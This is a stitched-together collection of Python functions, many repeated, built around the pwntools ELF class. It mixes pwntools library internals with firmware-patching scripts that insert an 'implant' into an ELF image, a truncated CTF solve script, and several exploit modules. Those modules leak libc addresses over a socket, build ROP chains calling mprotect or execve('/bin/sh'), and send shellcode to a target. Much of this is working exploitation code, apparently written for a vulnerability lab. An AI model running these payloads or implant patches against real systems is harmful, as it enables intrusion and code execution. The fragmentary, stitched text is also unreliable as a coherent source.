def libc(self):
"""libc(self) -> ELF
Leak the Build ID of the remote libc.so, download the file,
and load an ``ELF`` object with the correct base address.
Returns:
An ELF object, or None.
"""
libc = 'libc.so'
with self.waitfor('Downloading libc'):
dynlib = self._dynamic_load_dynelf(libc)
self.status("Trying lookup based on Build ID")
build_id = dynlib._lookup_build_id(libc)
if not build_id:
return None
self.status("Trying lookup based on Build ID: %s" % build_id)
path = libcdb.search_by_build_id(build_id)
if not path:
return None
libc = ELF(path)
libc.address = dynlib.libbase
return libc
def libc(self):
"""libc(self) -> ELF
Leak the Build ID of the remote libc.so, download the file,
and load an ``ELF`` object with the correct base address.
Returns:
An ELF object, or None.
"""
libc = 'libc.so'
with self.waitfor('Downloading libc'):
dynlib = self._dynamic_load_dynelf(libc)
self.status("Trying lookup based on Build ID")
build_id = dynlib._lookup_build_id(libc)
if not build_id:
return None
self.status("Trying lookup based on Build ID: %s" % build_id)
path = libcdb.search_by_build_id(build_id)
if not path:
return None
libc = ELF(path)
libc.address = dynlib.libbase
return libc
def findOffsets():
File = os.getenv("DIR", "/data") + os.sep + "kit_to.so"
f = ELF(File)
BaseAddr = f.symbols['PKTMGR_OutputTelemetry']
print("PKTMGR_OutputTelemetry @ %08x" % BaseAddr)
searchPattern = unhexlify("8b8344010000" + "8db0fa010000")
addr = BaseAddr + 0xF0
while True:
target = f.read(addr, len(searchPattern))
if searchPattern == target:
break
addr += 1
addr += 5 + len(searchPattern)
while True:
target = f.read(addr, 1)
if target == b'\x8b':
break
addr += 1
movAddr = addr
searchPattern = unhexlify("8d8b48010000" + "51" + "6a00" + "52")
while True:
target = f.read(addr, len(searchPattern))
if searchPattern == target:
break
addr += 1
addr += len(searchPattern)
patchOffset = addr
return (movAddr, patchOffset - BaseAddr)
def patch_old(f, data):
# Work in patch, it's stuck at the end of the file to avoid messing
with open(f, 'rb') as fd:
raw = fd.read()
e = ELF(f)
sections_start = e.symbols["sections"]
sections_end = sections_start
raw_text_h_start = e.header.e_ehsize
print(".text Header @ %08x" % raw_text_h_start)
raw_text_start = unpack(">I",
raw[raw_text_h_start + 4:raw_text_h_start + 8])[0]
text_size, text_size_mesz = unpack(
">II", raw[raw_text_h_start + 0x10:raw_text_h_start + 0x18])
print("Original .text offset,size: %08x %x,%x" %
(raw_text_start, text_size, text_size_mesz))
implant_addr = raw_text_start + text_size
print("Writing Implant @ %08x" % implant_addr)
raw = raw[:implant_addr] + data + raw[implant_addr + len(data):]
print("Updating size of .text to %x" % (text_size + len(data)))
raw = raw[:raw_text_h_start + 0x10] + 2 * pack(
">I",
len(data) + text_size) + raw[raw_text_h_start + 0x18:]
first_free = 0
print("Section start: %08x" % sections_start)
while True:
section = e.read(sections_end, 16 + 4 * 4)
paddr, raddr, plen, comp = unpack(">IIII", section[:4 * 4])
name = section[4 * 4:]
name = name[:name.index(b'\x00')]
if paddr == 0 and raddr == 0:
break
print("Section %s @ %08x:%08x" % (name, paddr, paddr + plen))
first_free = paddr + plen
sections_end += 16 + 4 * 4
first_free = (first_free + 0xFFFF) & ~(0xFFFF)
print("First free, rounded: %x" % first_free)
patch = pack(">IIII", first_free, implant_addr, len(data),
0) + b".challenge"
print("Sections end: %08x" % sections_end)
raw = raw[:sections_end +
raw_text_start] + patch + raw[sections_end + raw_text_start +
len(patch):]
with open("build/patched_" + f, "wb") as fd:
fd.write(raw)
def findGoalPatch(movAddr):
File = os.getenv("DIR", "/data") + os.sep + "kit_to.so"
f = ELF(File)
movInstr = f.read(movAddr, 6)
print("Mov Instruction", hexlify(movInstr))
patch = b"\x8b\x95" + movInstr[2:4]
#patch = patch[::-1]
print("Patch", hexlify(patch))
return patch
def main():
a = p.parse_args()
if not a.offset.startswith('0x'):
a.offset = '0x' + a.offset
offset = int(a.offset, 16)
bytes = unhex(a.bytes)
elf = ELF(a.elf)
elf.write(offset, bytes)
sys.stdout.write(elf.get_data())
def main():
a = p.parse_args()
if not a.offset.startswith('0x'):
a.offset = '0x' + a.offset
offset = int(a.offset, 16)
bytes = unhex(a.bytes)
elf = ELF(a.elf)
elf.write(offset, bytes)
sys.stdout.write(elf.get_data())
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib:
e = ELF(lib)
e.address = address
return e
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib or 'libc-' in lib:
e = ELF(lib)
e.address = address
return e
def binary(self, binary):
"""
Infer target architecture, bit-with, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from pwnlib.elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
self.os = binary.os
return binary
def __init__(self, elfs, base=None, badchars=b'', **kwargs):
"""
Arguments:
elfs(list): List of :class:`.ELF` objects for mining
base(int): Stack address where the first byte of the ROP chain lies, if known.
badchars(str): Characters which should not appear in ROP gadget addresses.
"""
import ropgadget
# Permit singular ROP(elf) vs ROP([elf])
if isinstance(elfs, ELF):
elfs = [elfs]
elif isinstance(elfs, (bytes, six.text_type)):
elfs = [ELF(elfs)]
#: List of individual ROP gadgets, ROP calls, SROP frames, etc.
#: This is intended to be the highest-level abstraction that we can muster.
self._chain = []
#: List of ELF files which are available for mining gadgets
self.elfs = elfs
#: Stack address where the first byte of the ROP chain lies, if known.
self.base = base
#: Whether or not the ROP chain directly sets the stack pointer to a value
#: which is not contiguous
self.migrated = False
#: Characters which should not appear in ROP gadget addresses.
self._badchars = set(badchars)
self.__load()
def __on_enoexec(self, exception):
"""We received an 'exec format' error (ENOEXEC)
This implies that the user tried to execute e.g.
an ARM binary on a non-ARM system, and does not have
binfmt helpers installed for QEMU.
"""
# Get the ELF binary for the target executable
with context.quiet:
# XXX: Cyclic imports :(
from pwnlib.elf import ELF
binary = ELF(self.executable)
# If we're on macOS, this will never work. Bail now.
# if platform.mac_ver()[0]:
# self.error("Cannot run ELF binaries on macOS")
# Determine what architecture the binary is, and find the
# appropriate qemu binary to run it.
qemu = get_qemu_user(arch=binary.arch)
qemu = which(qemu)
if qemu:
self._qemu = qemu
args = [qemu]
if self.argv:
args += ['-0', self.argv[0]]
args += ['--']
return [args, qemu]
# If we get here, we couldn't run the binary directly, and
# we don't have a qemu which can run it.
self.exception(exception)
def unstrip_libc(filename):
"""
Given a path to a libc binary, attempt to download matching debug info
and add them back to the given binary.
This modifies the given file.
Arguments:
filename(str):
Path to the libc binary to unstrip.
Returns:
:const:`True` if binary was unstripped, :const:`False` otherwise.
Examples:
>>> filename = search_by_build_id('2d1c5e0b85cb06ff47fa6fa088ec22cb6e06074e', unstrip=False)
>>> libc = ELF(filename)
>>> hex(libc.symbols.read)
'0xe56c0'
>>> 'main_arena' in libc.symbols
False
>>> unstrip_libc(filename)
True
>>> libc = ELF(filename)
>>> hex(libc.symbols.main_arena)
'0x1d57a0'
>>> unstrip_libc(which('python'))
False
>>> filename = search_by_build_id('06a8004be6e10c4aeabbe0db74423ace392a2d6b', unstrip=True)
>>> 'main_arena' in ELF(filename).symbols
True
"""
if not which('eu-unstrip'):
log.warn_once('Couldn\'t find "eu-unstrip" in PATH. Install elfutils first.')
return False
libc = ELF(filename, checksec=False)
if not libc.buildid:
log.warn_once('Given libc does not have a buildid. Cannot look for debuginfo to unstrip.')
return False
for server_url in DEBUGINFOD_SERVERS:
libc_dbg = _search_debuginfo_by_hash(server_url, enhex(libc.buildid))
if libc_dbg:
break
else:
log.warn_once('Couldn\'t find debug info for libc with build_id %s on any debuginfod server.', enhex(libc.buildid))
return False
# Add debug info to given libc binary inplace.
p = process(['eu-unstrip', '-o', filename, filename, libc_dbg])
output = p.recvall()
p.close()
if output:
log.error('Failed to unstrip libc binary: %s', output)
return False
return True
def _find_linkmap_assisted(self, path):
"""Uses an ELF file to assist in finding the link_map.
"""
if isinstance(path, ELF):
path = path.path
# Load a fresh copy of the ELF
with context.local(log_level='error'):
elf = ELF(path)
elf.address = self.libbase
w = self.waitfor("Loading from %r" % elf.path)
# Save our real leaker
real_leak = self.leak
# Create a fake leaker which just leaks out of the 'loaded' ELF
# However, we may load things which are outside of the ELF (e.g.
# the linkmap or GOT) so we need to fall back on the real leak.
@MemLeak
def fake_leak(address):
try:
return elf.read(address, 4)
except ValueError:
return real_leak.b(address)
# Save off our real leaker, use the fake leaker
self.leak = fake_leak
# Get useful pointers for resolving the linkmap faster
w.status("Searching for DT_PLTGOT")
pltgot = self._find_dt(constants.DT_PLTGOT)
w.status("Searching for DT_DEBUG")
debug = self._find_dt(constants.DT_DEBUG)
# Restore the real leaker
self.leak = real_leak
# Find the linkmap using the helper pointers
self._find_linkmap(pltgot, debug)
self.success('Done')
def _find_linkmap_assisted(self, path):
"""Uses an ELF file to assist in finding the link_map.
"""
if isinstance(path, ELF):
path = path.path
# Load a fresh copy of the ELF
with context.local(log_level='error'):
elf = ELF(path)
elf.address = self.libbase
w = self.waitfor("Loading from %r" % elf.path)
# Save our real leaker
real_leak = self.leak
# Create a fake leaker which just leaks out of the 'loaded' ELF
# However, we may load things which are outside of the ELF (e.g.
# the linkmap or GOT) so we need to fall back on the real leak.
@MemLeak
def fake_leak(address):
try:
return elf.read(address, 4)
except ValueError:
return real_leak.b(address)
# Save off our real leaker, use the fake leaker
self.leak = fake_leak
# Get useful pointers for resolving the linkmap faster
w.status("Searching for DT_PLTGOT")
pltgot = self._find_dt(constants.DT_PLTGOT)
w.status("Searching for DT_DEBUG")
debug = self._find_dt(constants.DT_DEBUG)
# Restore the real leaker
self.leak = real_leak
# Find the linkmap using the helper pointers
self._find_linkmap(pltgot, debug)
self.success('Done')
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
Example:
>>> p = process("/bin/cat")
>>> libc = p.libc
>>> libc # doctest: +SKIP
ELF('/lib64/libc-...so')
>>> p.close()
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib or 'libc-' in lib:
e = ELF(lib)
e.address = address
return e
def patch(f, implant_elf, implant):
e = ELF(f)
sections_base_addr = e.symbols["sections"]
implant_section_num = 3 # base 0
section_patch_addr = sections_base_addr + implant_section_num * 0x20
implant_prom_addr = 0x00220000
implant_prom_len = len(implant)
implant_load_addr = 0x42800000
implant_section_flags = 0 # Not Compressed
section_patch = pack(">IIII", implant_load_addr, implant_prom_addr,
implant_prom_len, implant_section_flags)
section_patch = section_patch + b".challenge"
# Patch in Implant
patch_file(implant, implant_prom_addr)
# Patch Sections
e.write(section_patch_addr, section_patch)
patch_file(section_patch, section_patch_addr)
# Patch Entry Point
e.write(e.symbols["_entry"], pack(">I", implant_load_addr))
patch_file(pack(">I", implant_load_addr), e.symbols["_entry"])
e.save(f + ".patched")
with open(implant_elf, "r+b") as f:
data = f.read()
#data = re.sub(b'\x42\x80', b'\x00,\x22', data)
#data = re.sub(b'\x42\x7f', b'\x00,\x21', data)
#data = re.sub(b'\x42\x81', b'\x00,\x23', data)
with open(implant_elf, 'wb') as f:
f.write(data[:0x18])
f.write(pack(">I", implant_prom_addr))
f.write(data[0x1c:0x3c])
f.write(pack(">II", 0x00210000, 0x00210000))
f.write(data[0x44:0x5c])
f.write(pack(">H", 0x0023))
f.write(data[0x5e:0x60])
f.write(pack(">H", 0x0023))
f.write(data[0x62:])
def __init__(self, elfs, base=None, **kwargs):
"""
Arguments:
elfs(list): List of :class:`.ELF` objects for mining
"""
import ropgadget
# Permit singular ROP(elf) vs ROP([elf])
if isinstance(elfs, ELF):
elfs = [elfs]
elif isinstance(elfs, (str, unicode)):
elfs = [ELF(elfs)]
self.elfs = elfs
self._chain = []
self.base = base
self.migrated = False
self.__load()
def run_shellcode(bytes, **kw):
"""Given assembled machine code bytes, execute them.
Example:
>>> bytes = asm('mov ebx, 3; mov eax, SYS_exit; int 0x80;')
>>> p = run_shellcode(bytes)
>>> p.wait_for_close()
>>> p.poll()
3
>>> bytes = asm('mov r0, #12; mov r7, #1; svc #0', arch='arm')
>>> p = run_shellcode(bytes, arch='arm')
>>> p.wait_for_close()
>>> p.poll()
12
"""
return ELF.from_bytes(bytes, **kw).process()
def run_shellcode(bytes, **kw):
"""Given assembled machine code bytes, execute them.
Example:
>>> bytes = asm('mov ebx, 3; mov eax, SYS_exit; int 0x80;')
>>> p = run_shellcode(bytes)
>>> p.wait_for_close()
>>> p.poll()
3
>>> bytes = asm('mov r0, #12; mov r7, #1; svc #0', arch='arm')
>>> p = run_shellcode(bytes, arch='arm')
>>> p.wait_for_close()
>>> p.poll()
12
"""
return ELF.from_bytes(bytes, **kw).process()
def run_assembly(assembly):
"""
Given an assembly listing, assemble and execute it.
Returns:
A :class:`pwnlib.tubes.process.process` tube to interact with the process.
Example:
>>> p = run_assembly('mov ebx, 3; mov eax, SYS_exit; int 0x80;')
>>> p.wait_for_close()
>>> p.poll()
3
>>> p = run_assembly('mov r0, #12; mov r7, #1; svc #0', arch='arm')
>>> p.wait_for_close()
>>> p.poll()
12
"""
return ELF.from_assembly(assembly).process()
def run_assembly(assembly):
"""
Given an assembly listing, assemble and execute it.
Returns:
A :class:`pwnlib.tubes.process.process` tube to interact with the process.
Example:
>>> p = run_assembly('mov ebx, 3; mov eax, SYS_exit; int 0x80;')
>>> p.wait_for_close()
>>> p.poll()
3
>>> p = run_assembly('mov r0, #12; mov r7, #1; svc #0', arch='arm')
>>> p.wait_for_close()
>>> p.poll()
12
"""
return ELF.from_assembly(assembly).process()
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data,16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
rbpvalue= int(recv_data1,16)
print "rbpvalue = " + hex(rbpvalue)
#get shellcode address
self.property['shellcodeaddress'] = rbpvalue + 112
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pagenum=self.property['data2'] * 3
print pagenum
#print helloworld
shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
#shell
shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
#set payload rop shut off dep
payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['data3']) + p64(pop_ret4_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + self.payload
print "\n##########sending payload to shut off dep ##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret1':0x0000000000401696, #gadget address
'ret2':0x0000000000442fe9 ,
'ret3':0x00000000004c26e8 ,
'ret4':0x0000000000467685 ,
'pageaddress':0x7fffffffd000,
'shellcodeaddress':0x0,#shellcode address in stack
'data1':0x0000000000000007,# PROT_EXEC The memory can be executed.
'data2':0x0000000000001000,# 4096 pagesize
'data3':0x000000000000000a, #mprotect systemcall number, mprotect() changes protection for the calling process's memory page(s)
'data4':0x000000000000003b,#execv systemcall number
'data5':0x0000000000000000,
'offset':24, # offset
'sysaddress':0x0} # system function address, initialize 0
self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic_stacknoexe')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
rbpvalue= int(recv_data1,16)
print "rbpvalue = " + hex(rbpvalue)
#get shellcode address
self.property['shellcodeaddress'] = rbpvalue + 112
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret offset
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pagenum=self.property['data2'] * 3
print pagenum
#print helloworld
shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
#shell
#shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
#set payload rop shut off dep
payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['data3']) + p64(pop_ret4_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + shellcode
print "\n##########sending payload to shut off dep ##########\n"
s.send(payload)
s.close()
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data,16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
rbpvalue= int(recv_data1,16)
print "rbpvalue = " + hex(rbpvalue)
#get shellcode address
self.property['shellcodeaddress'] = rbpvalue + 96
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['ret3']
pagenum=self.property['data2'] * 3
print pagenum
#print helloworld
shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
#shell
shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
#set payload rop shut off dep
payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + self.payload
print "\n##########sending payload to shut off dep ##########\n"
s.send(payload)
s.close()
else:
print 'no exit static'
#!/usr/bin/env python3
import argparse
import binascii
import socket
import sys
from pwnlib.elf import ELF
parser = argparse.ArgumentParser(description="solve script for 'read_it'")
parser.add_argument('--host', default="challenge", help="the host for the instance")
parser.add_argument('--port', type=int, default=5000, help="the port of the instance")
args = parser.parse_args()
elf = ELF('read_it')
key = elf.string(elf.symbols["key"])
secret1 = elf.string(elf.symbols["secret1"])
secret2 = elf.string(elf.symbols["secret2"])
print("key: ", key.decode())
print("secret1:", secret1.decode())
print("secret2:", secret2.decode())
def encode_first(data):
r = bytearray()
for i in range(0, 16):
r.append(data[i] ^ 0x17)
return r
def encode_second(data):
k = ""
for i in range(0, 16):
def run(self):
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
self.property = {'ret1': 0x0000000000021102, # gadget address in libc
'ret2': 0x000000000008ae95,
'ret3': 0x000000000003a718,
'ret4': 0x0000000000114809,
'ret5': 0x00000000000bb945,
'data1': 0x000000000000003b, # execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 40, # offset
'sysaddress': 0x0} # system function address, initialize 0
# get new sysaddress here
s.send("a") # any string
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
# get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
# get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
# get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
# pop_ret5_addr =pop_ret4_addr - 2
# set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret1': 0x0000000000401696, # gadget address in libc
'ret2': 0x00000000004264af,
'ret3': 0x00000000004c26e8,
'ret4': 0x0000000000442fe9,
'ret5': 0x0000000000467685,
'data1': 0x000000000000003b, # execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 24, # offset
'sysaddress': 0x0} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
# get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
# get ret address
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pop_ret5_addr = self.property['ret5']
# set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
self.property = {'ret1': 0x00018395, # gadget address in libc : pop ebx ; ret
'ret2': 0x0002c5dc, # : xor eax, eax ; ret
'ret3': 0x00023f97, # : pop eax ; ret
'ret4': 0x0002baab, # : pop ecx ; pop edx ; ret
'ret5': 0x00002c87, # : int 0x80
'data1': 0x0000000b, # execv systemcall number
'data2': 0x00000000,
'data3': 0x00000000,
'offset': 26, # offset
'sysaddress': 0x0} # system function address, initialize 0
# get new sysaddress here
s.send("a") # any string
recv_data = s.recv(8)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib32/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
# get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
# get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
# get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
# pop_ret5_addr =pop_ret4_addr - 2
# set payload
payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
self.property['data2']) + p32(self.property['data3']) + p32(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret1': 0x080481d1, # : pop ebx ; ret
'ret2': 0x080494e3, # : xor eax, eax ; ret
'ret3': 0x080b95b6, # : pop eax ; ret
'ret4': 0x080e0859, # : pop ecx ; ret
'ret5': 0x0807079a, # : pop edx ; ret
'ret6': 0x0806e127, # : int 0x80
'data1': 0x0000000b, # execv systemcall number
'data2': 0x00000000,
'data3': 0x00000000,
'offset': 22, # offset
'sysaddress': 0x0} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic32'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/code_reuse32_static')
# get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
# get ret address
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pop_ret5_addr = self.property['ret5']
pop_ret6_addr = self.property['ret6']
# set payload
payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
self.property['data2']) + p32(pop_ret5_addr) + p32(self.property['data3']) + p32(pop_ret6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
print 'Unrecognized architecture, stop.'
return
def lookup (self, symb = None, lib = None):
"""lookup(symb = None, lib = None) -> int
Find the address of ``symbol``, which is found in ``lib``.
Arguments:
symb(str): Named routine to look up
lib(str): Substring to match for the library name.
If omitted, the current library is searched.
If set to ``'libc'``, ``'libc.so'`` is assumed.
Returns:
Address of the named symbol, or :const:`None`.
"""
result = None
if lib == 'libc':
lib = 'libc.so'
#
# Get a pretty name for the symbol to show the user
#
if symb and lib:
pretty = '%r in %r' % (symb, lib)
else:
pretty = repr(symb or lib)
if not pretty:
self.failure("Must specify a library or symbol")
self.waitfor('Resolving %s' % pretty)
#
# If we are loading from a different library, create
# a DynELF instance for it.
#
if lib is not None: dynlib = self._dynamic_load_dynelf(lib)
else: dynlib = self
if dynlib is None:
log.failure("Could not find %r" % lib)
return None
#
# If we are resolving a symbol in the library, find it.
#
if symb and self.libcdb:
# Try a quick lookup by build ID
self.status("Trying lookup based on Build ID")
build_id = dynlib._lookup_build_id(lib=lib)
result = None
if build_id:
log.info("Trying lookup based on Build ID: %s" % build_id)
